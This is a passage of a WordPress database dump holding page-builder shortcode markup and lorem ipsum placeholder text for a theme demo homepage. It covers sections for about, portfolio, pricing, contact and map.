Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home14','','publish','open','open','','home14','','','2020-10-28 13:47:38','2020-10-28 13:47:38','',0,'http://veented.com/themes/north/?page_id=985',0,'page','',0),(1929,1,'2014-09-12 17:27:02','2014-09-12 17:27:02','[vc_row css=\".vc_custom_1410556411627{padding-top: 0px !important;padding-bottom: 0px !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" video_bg=\"vimeo\" vimeo=\"71617061\" bg_overlay=\"darker\"][vc_column width=\"1/1\"][vntd_fullscreen_slider text_static=\"We are North! We love to design. We are happy with you are!\" style=\"style1\" posts_nr=\"6\" button1_label=\"Purchase\" button1_url=\"#\" custom_links=\"Welcome to North,We are Designers,We Love to Design\" text_dynamic=\"We create awesome themes!,We are creative Designers,We love to Design\" button2_label=\"Read More\" button2_url=\"#about\" animated=\"no\" bg_overlay=\"dark2\" buttons_color=\"dark\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply. [list icon=\"caret-right\" color=\"dark\" background=\"yes\"] [li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li] [li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li] [li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li] [li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li] [li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li] [/list] Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#facts\" color=\"black\" scroll=\"yes\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405492003813{border-top-width: 1px !important;padding-bottom: 10px !important;border-color: #eeeeee !important;border-style: solid !important;}\" el_id=\"works\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"5\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" fullwidth=\"no\" thumb_space=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709770765{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709776984{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406709787994{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1410557528085{padding-top: 0px !important;background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dots_dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][vntd_twitter account_id=\"envato\" count=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409759263341{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384b99d-fe26920f-a91e\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384b99d-fe26920f-a91e\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"size-full wp-image-927 alignright\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6b99d-fe26920f-a91e\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099917341{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405424323297{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home14','','inherit','closed','closed','','985-revision-v1','','','2014-09-12 17:27:02','2014-09-12 17:27:02','',985,'http://highperformingstudent.com/2014/09/12/985-revision-v1/',0,'revision','',0),(1916,1,'2014-09-15 03:14:21','2014-09-15 03:14:21','[vc_row css=\".vc_custom_1405098881992{padding-top: 0px !important;padding-bottom: 0px !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][vntd_fullscreen_slider images=\"545,546,547\" text_static=\"We are North! We love to design. We are happy with you are!\" style=\"style1\" posts_nr=\"6\" button1_label=\"Purchase\" button1_url=\"#\" custom_links=\"Welcome to North,We are Designers,We Love to Design\" text_dynamic=\"We create awesome themes!,We are creative Designers,We love to Design\" button2_label=\"Read More\" button2_url=\"#about\" animated=\"no\" bg_overlay=\"dark2\" buttons_color=\"dark\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" 